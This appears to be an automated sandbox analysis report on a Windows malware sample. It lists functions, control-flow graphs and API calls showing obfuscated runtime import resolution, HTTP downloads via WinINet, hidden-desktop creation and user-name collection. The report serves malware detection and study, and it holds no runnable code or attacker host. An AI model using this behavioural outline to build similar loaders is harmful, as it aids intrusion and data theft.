                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                          • String ID:
                          • API String ID: 3366406952-0
                          • Opcode ID: e2ba703a6ad5ed510cfddc1de3b762142021dd56ead29c6c8253a2dd7aec8743
                          • Instruction ID: 03021059dba16aa87f5c98c3e9dfc5b5bc8650af3fc5268864bb81aad2973203
                          • Opcode Fuzzy Hash: e2ba703a6ad5ed510cfddc1de3b762142021dd56ead29c6c8253a2dd7aec8743
                          • Instruction Fuzzy Hash: 1771C731700325ABD720ABB1ED4DB6F767AAF51745F44102AF506A72B1DFB89801CFA8
                          Function 00406C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2234 406c40-406c64 call 402930 2237 406c75-406c97 call 404bc0 2234->2237 2238 406c66-406c6b 2234->2238 2242 406c99 2237->2242 2243 406caa-406cba call 402930 2237->2243 2238->2237 2239 406c6d-406c6f lstrcpy 2238->2239 2239->2237 2244 406ca0-406ca8 2242->2244 2247 406cc8-406cf5 InternetOpenA StrCmpCA 2243->2247 2248 406cbc-406cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 406cf7 2247->2249 2250 406cfa-406cfc 2247->2250 2248->2247 2249->2250 2251 406d02-406d22 InternetConnectA 2250->2251 2252 406ea8-406ebb call 402930 2250->2252 2253 406ea1-406ea2 InternetCloseHandle 2251->2253 2254 406d28-406d5d HttpOpenRequestA 2251->2254 2261 406ec9-406ee0 call 402a20 * 2 2252->2261 2262 406ebd-406ebf 2252->2262 2253->2252 2256 406d63-406d65 2254->2256 2257 406e94-406e9e InternetCloseHandle 2254->2257 2259 406d67-406d77 InternetSetOptionA 2256->2259 2260 406d7d-406dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 406dd4-406de4 call 423d90 2260->2263 2264 406daf-406dd3 call 4271e0 call 402a20 * 2 2260->2264 2262->2261 2265 406ec1-406ec3 lstrcpy 2262->2265 2263->2264 2275 406de6-406de8 2263->2275 2265->2261 2276 406e8d-406e8e InternetCloseHandle 2275->2276 2277 406dee-406e07 InternetReadFile 2275->2277 2276->2257 2277->2276 2279 406e0d 2277->2279 2281 406e10-406e15 2279->2281 2281->2276 2283 406e17-406e3d call 427310 2281->2283 2286 406e44-406e51 call 402930 2283->2286 2287 406e3f call 402a20 2283->2287 2291 406e61-406e8b call 402a20 InternetReadFile 2286->2291 2292 406e53-406e57 2286->2292 2287->2286 2291->2276 2291->2281 2292->2291 2293 406e59-406e5b lstrcpy 2292->2293 2293->2291
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406C6F
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00406CC2
                          • InternetOpenA.WININET(0042CFEC,00000001,00000000,00000000,00000000), ref: 00406CD5
                          • StrCmpCA.SHLWAPI(?,00FBE538), ref: 00406CED
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
                          • HttpOpenRequestA.WININET(00000000,GET,?,00FBD990,00000000,00000000,-00400100,00000000), ref: 00406D50
                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00406E5B
                          • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
                          • InternetCloseHandle.WININET(00000000), ref: 00406E8E
                          • InternetCloseHandle.WININET(?), ref: 00406E98
                          • InternetCloseHandle.WININET(00000000), ref: 00406EA2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00406EC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                          • String ID: ERROR$GET
                          • API String ID: 3687753495-3591763792
                          • Opcode ID: 4e49c96fccde84a7acdfb28c75d2ae3e132fd84c83d84d1e2d8bf925d7c46bd0
                          • Instruction ID: 91590bf360eea9fd530f380bfccddf156e0f5cf0bac8cd817fa6b8c96a2a5053
                          • Opcode Fuzzy Hash: 4e49c96fccde84a7acdfb28c75d2ae3e132fd84c83d84d1e2d8bf925d7c46bd0
                          • Instruction Fuzzy Hash: 3B816F71B10315ABEB20DFA5DC89BAF77B9AF44700F154069F905B72C0DB78AD058BA8
                          Function 00404A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2850 404a60-404afc RtlAllocateHeap 2867 404b7a-404bbe VirtualProtect 2850->2867 2868 404afe-404b03 2850->2868 2869 404b06-404b78 2868->2869 2869->2867
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404AA3
                          • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-3329630956
                          • Opcode ID: 36c237bca2f24804bca255b9ecae7caa065b10654710d6113a3736e4754386b3
                          • Instruction ID: 2f413e443fbc1c09a45ce1161c2721836de4c0241506bf7b32ac51e3216322a2
                          • Opcode Fuzzy Hash: 36c237bca2f24804bca255b9ecae7caa065b10654710d6113a3736e4754386b3
                          • Instruction Fuzzy Hash: 0A310398B8022C769620EBFF4C47F9F6E55DFCD760F212097750857180C9A96680CBEA
                          Function 00422A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422A6F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422A76
                          • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 6c1fa00503cf644c0ad8ae9dfa58bb6559640976417a912d3d4b7ac5badfbdc6
                          • Instruction ID: daca8bc385b25320d3fa5486434c0ccaa4de5bcaee4211da3630c20ba90b8488
                          • Opcode Fuzzy Hash: 6c1fa00503cf644c0ad8ae9dfa58bb6559640976417a912d3d4b7ac5badfbdc6
                          • Instruction Fuzzy Hash: DBF0B4B1A44214AFC700DF88DD49B9EBBBCF704B21F10021AFD15E3280D7B419048BE1
                          Function 004266E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 4266e0-4266e7 634 426afe-426b92 LoadLibraryA * 8 633->634 635 4266ed-426af9 GetProcAddress * 43 633->635 636 426b94-426c03 GetProcAddress * 5 634->636 637 426c08-426c0f 634->637 635->634 636->637 638 426cd2-426cd9 637->638 639 426c15-426ccd GetProcAddress * 8 637->639 640 426cdb-426d4a GetProcAddress * 5 638->640 641 426d4f-426d56 638->641 639->638 640->641 642 426de9-426df0 641->642 643 426d5c-426de4 GetProcAddress * 6 641->643 644 426f10-426f17 642->644 645 426df6-426f0b GetProcAddress * 12 642->645 643->642 646 426f19-426f88 GetProcAddress * 5 644->646 647 426f8d-426f94 644->647 645->644 646->647 648 426fc1-426fc8 647->648 649 426f96-426fbc GetProcAddress * 2 647->649 650 426ff5-426ffc 648->650 651 426fca-426ff0 GetProcAddress * 2 648->651 649->648 652 427002-4270e8 GetProcAddress * 10 650->652 653 4270ed-4270f4 650->653 651->650 652->653 654 427152-427159 653->654 655 4270f6-42714d GetProcAddress * 4 653->655 656 42715b-427169 GetProcAddress 654->656 657 42716e-427175 654->657 655->654 656->657 658 4271d3 657->658 659 427177-4271ce GetProcAddress * 4 657->659 659->658
                          APIs
                          • GetProcAddress.KERNEL32(75550000,00FA62C0), ref: 004266F5
                          • GetProcAddress.KERNEL32(75550000,00FA6440), ref: 0042670D
                          • GetProcAddress.KERNEL32(75550000,00FB8EF8), ref: 00426726
                          • GetProcAddress.KERNEL32(75550000,00FB8F10), ref: 0042673E
                          • GetProcAddress.KERNEL32(75550000,00FBCB30), ref: 00426756
                          • GetProcAddress.KERNEL32(75550000,00FBCA28), ref: 0042676F
                          • GetProcAddress.KERNEL32(75550000,00FAB0B8), ref: 00426787
                          • GetProcAddress.KERNEL32(75550000,00FBC980), ref: 0042679F
                          • GetProcAddress.KERNEL32(75550000,00FBCAA0), ref: 004267B8
                          • GetProcAddress.KERNEL32(75550000,00FBCA58), ref: 004267D0
                          • GetProcAddress.KERNEL32(75550000,00FBC998), ref: 004267E8
                          • GetProcAddress.KERNEL32(75550000,00FA62A0), ref: 00426801
                          • GetProcAddress.KERNEL32(75550000,00FA6380), ref: 00426819
                          • GetProcAddress.KERNEL32(75550000,00FA6540), ref: 00426831
                          • GetProcAddress.KERNEL32(75550000,00FA6360), ref: 0042684A
                          • GetProcAddress.KERNEL32(75550000,00FBCAB8), ref: 00426862
                          • GetProcAddress.KERNEL32(75550000,00FBC9B0), ref: 0042687A
                          • GetProcAddress.KERNEL32(75550000,00FAB2E8), ref: 00426893
                          • GetProcAddress.KERNEL32(75550000,00FA63A0), ref: 004268AB
                          • GetProcAddress.KERNEL32(75550000,00FBCB00), ref: 004268C3
                          • GetProcAddress.KERNEL32(75550000,00FBC950), ref: 004268DC
                          • GetProcAddress.KERNEL32(75550000,00FBCA70), ref: 004268F4
                          • GetProcAddress.KERNEL32(75550000,00FBCB48), ref: 0042690C
                          • GetProcAddress.KERNEL32(75550000,00FA63C0), ref: 00426925
                          • GetProcAddress.KERNEL32(75550000,00FBC9C8), ref: 0042693D
                          • GetProcAddress.KERNEL32(75550000,00FBCB60), ref: 00426955
                          • GetProcAddress.KERNEL32(75550000,00FBCA40), ref: 0042696E
                          • GetProcAddress.KERNEL32(75550000,00FBCA88), ref: 00426986
                          • GetProcAddress.KERNEL32(75550000,00FBC9E0), ref: 0042699E
                          • GetProcAddress.KERNEL32(75550000,00FBCAD0), ref: 004269B7
                          • GetProcAddress.KERNEL32(75550000,00FBCAE8), ref: 004269CF
                          • GetProcAddress.KERNEL32(75550000,00FBC9F8), ref: 004269E7
                          • GetProcAddress.KERNEL32(75550000,00FBC938), ref: 00426A00
                          • GetProcAddress.KERNEL32(75550000,00FBA1C8), ref: 00426A18
                          • GetProcAddress.KERNEL32(75550000,00FBCBF0), ref: 00426A30
                          • GetProcAddress.KERNEL32(75550000,00FBCB18), ref: 00426A49
                          • GetProcAddress.KERNEL32(75550000,00FA6500), ref: 00426A61
                          • GetProcAddress.KERNEL32(75550000,00FBCA10), ref: 00426A79
                          • GetProcAddress.KERNEL32(75550000,00FA63E0), ref: 00426A92
                          • GetProcAddress.KERNEL32(75550000,00FBCB78), ref: 00426AAA
                          • GetProcAddress.KERNEL32(75550000,00FBCBD8), ref: 00426AC2
                          • GetProcAddress.KERNEL32(75550000,00FA6400), ref: 00426ADB
                          • GetProcAddress.KERNEL32(75550000,00FA6460), ref: 00426AF3
                          • LoadLibraryA.KERNEL32(00FBC920,0042051F), ref: 00426B05
                          • LoadLibraryA.KERNEL32(00FBCB90), ref: 00426B16
                          • LoadLibraryA.KERNEL32(00FBCBA8), ref: 00426B28
                          • LoadLibraryA.KERNEL32(00FBCBC0), ref: 00426B3A
                          • LoadLibraryA.KERNEL32(00FBCC08), ref: 00426B4B
                          • LoadLibraryA.KERNEL32(00FBC968), ref: 00426B5D
                          • LoadLibraryA.KERNEL32(00FBCC68), ref: 00426B6F
                          • LoadLibraryA.KERNEL32(00FBCDE8), ref: 00426B80
                          • GetProcAddress.KERNEL32(75750000,00FA6900), ref: 00426B9C
                          • GetProcAddress.KERNEL32(75750000,00FBCE48), ref: 00426BB4
                          • GetProcAddress.KERNEL32(75750000,00FB8860), ref: 00426BCD
                          • GetProcAddress.KERNEL32(75750000,00FBCE30), ref: 00426BE5
                          • GetProcAddress.KERNEL32(75750000,00FA69C0), ref: 00426BFD
                          • GetProcAddress.KERNEL32(73B30000,00FAB0E0), ref: 00426C1D
                          • GetProcAddress.KERNEL32(73B30000,00FA6760), ref: 00426C35
                          • GetProcAddress.KERNEL32(73B30000,00FAB130), ref: 00426C4E
                          • GetProcAddress.KERNEL32(73B30000,00FBCDD0), ref: 00426C66
                          • GetProcAddress.KERNEL32(73B30000,00FBCE60), ref: 00426C7E
                          • GetProcAddress.KERNEL32(73B30000,00FA67A0), ref: 00426C97
                          • GetProcAddress.KERNEL32(73B30000,00FA6680), ref: 00426CAF
                          • GetProcAddress.KERNEL32(73B30000,00FBCE00), ref: 00426CC7
                          • GetProcAddress.KERNEL32(757E0000,00FA6960), ref: 00426CE3
                          • GetProcAddress.KERNEL32(757E0000,00FA6700), ref: 00426CFB
                          • GetProcAddress.KERNEL32(757E0000,00FBCC20), ref: 00426D14
                          • GetProcAddress.KERNEL32(757E0000,00FBCE78), ref: 00426D2C
                          • GetProcAddress.KERNEL32(757E0000,00FA6940), ref: 00426D44
                          • GetProcAddress.KERNEL32(758D0000,00FAB018), ref: 00426D64
                          • GetProcAddress.KERNEL32(758D0000,00FAB1F8), ref: 00426D7C
                          • GetProcAddress.KERNEL32(758D0000,00FBCCE0), ref: 00426D95
                          • GetProcAddress.KERNEL32(758D0000,00FA6780), ref: 00426DAD
                          • GetProcAddress.KERNEL32(758D0000,00FA6720), ref: 00426DC5
                          • GetProcAddress.KERNEL32(758D0000,00FAB220), ref: 00426DDE
                          • GetProcAddress.KERNEL32(76BE0000,00FBCE18), ref: 00426DFE
                          • GetProcAddress.KERNEL32(76BE0000,00FA68A0), ref: 00426E16
                          • GetProcAddress.KERNEL32(76BE0000,00FB8960), ref: 00426E2F
                          • GetProcAddress.KERNEL32(76BE0000,00FBCE90), ref: 00426E47
                          • GetProcAddress.KERNEL32(76BE0000,00FBCC80), ref: 00426E5F
                          • GetProcAddress.KERNEL32(76BE0000,00FA67C0), ref: 00426E78
                          • GetProcAddress.KERNEL32(76BE0000,00FA66A0), ref: 00426E90
                          • GetProcAddress.KERNEL32(76BE0000,00FBCEC0), ref: 00426EA8
                          • GetProcAddress.KERNEL32(76BE0000,00FBCD58), ref: 00426EC1
                          • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00426ED7
                          • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00426EEE
                          • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00426F05
                          • GetProcAddress.KERNEL32(75670000,00FA66C0), ref: 00426F21
                          • GetProcAddress.KERNEL32(75670000,00FBCCC8), ref: 00426F39
                          • GetProcAddress.KERNEL32(75670000,00FBCEA8), ref: 00426F52
                          • GetProcAddress.KERNEL32(75670000,00FBCED8), ref: 00426F6A
                          • GetProcAddress.KERNEL32(75670000,00FBCEF0), ref: 00426F82
                          • GetProcAddress.KERNEL32(759D0000,00FA69E0), ref: 00426F9E
                          • GetProcAddress.KERNEL32(759D0000,00FA6A00), ref: 00426FB6
                          • GetProcAddress.KERNEL32(76D80000,00FA6740), ref: 00426FD2
                          • GetProcAddress.KERNEL32(76D80000,00FBCF08), ref: 00426FEA
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6880), ref: 0042700A
                          • GetProcAddress.KERNEL32(6F5C0000,00FA67E0), ref: 00427022
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6860), ref: 0042703B
                          • GetProcAddress.KERNEL32(6F5C0000,00FBCC38), ref: 00427053
                          • GetProcAddress.KERNEL32(6F5C0000,00FA68C0), ref: 0042706B
                          • GetProcAddress.KERNEL32(6F5C0000,00FA68E0), ref: 00427084
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6920), ref: 0042709C
                          • GetProcAddress.KERNEL32(6F5C0000,00FA6980), ref: 004270B4
                          • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 004270CB
                          • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 004270E2
                          • GetProcAddress.KERNEL32(75480000,00FBCCF8), ref: 004270FE
                          • GetProcAddress.KERNEL32(75480000,00FB8800), ref: 00427116
                          • GetProcAddress.KERNEL32(75480000,00FBCD70), ref: 0042712F
                          • GetProcAddress.KERNEL32(75480000,00FBCC50), ref: 00427147
                          • GetProcAddress.KERNEL32(753B0000,00FA6800), ref: 00427163
                          • GetProcAddress.KERNEL32(6EA10000,00FBCC98), ref: 0042717F
                          • GetProcAddress.KERNEL32(6EA10000,00FA69A0), ref: 00427197
                          • GetProcAddress.KERNEL32(6EA10000,00FBCCB0), ref: 004271B0
                          • GetProcAddress.KERNEL32(6EA10000,00FBCD10), ref: 004271C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                          • API String ID: 2238633743-3468015613
                          • Opcode ID: 8a0bdfc08fccdd3cba7c5a7ed546d60d1095bcb3ca406ab1f60ec5b9cf0af696
                          • Instruction ID: 24e69b76aff6c9b7150681862aeee9ecdced478a12f1b503b046a4f57b6f05f2
                          • Opcode Fuzzy Hash: 8a0bdfc08fccdd3cba7c5a7ed546d60d1095bcb3ca406ab1f60ec5b9cf0af696
                          • Instruction Fuzzy Hash: 18625EB9A103009FD758DF65ED88AA637BBF789345310A91DF95683364DBB4A800DFB0
                          Function 0041F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F1D5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F1F1
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F1FC
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F215
                          • lstrlen.KERNEL32(0042CFEC), ref: 0041F220
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F239
                          • lstrcpy.KERNEL32(00000000,00434FA0), ref: 0041F25E
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F28C
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F2C0
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041F2F0
                          • lstrlen.KERNEL32(00FA6640), ref: 0041F315
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: ERROR
                          • API String ID: 367037083-2861137601
                          • Opcode ID: 8862ebf8b6f4e270906207828ff0c88485882796370b8098f26a52cfc15cf4be
                          • Instruction ID: 55742852dad097f903fca5b8627fb2a125a8e8ebffd627457b7393aea9bf8277
                          • Opcode Fuzzy Hash: 8862ebf8b6f4e270906207828ff0c88485882796370b8098f26a52cfc15cf4be
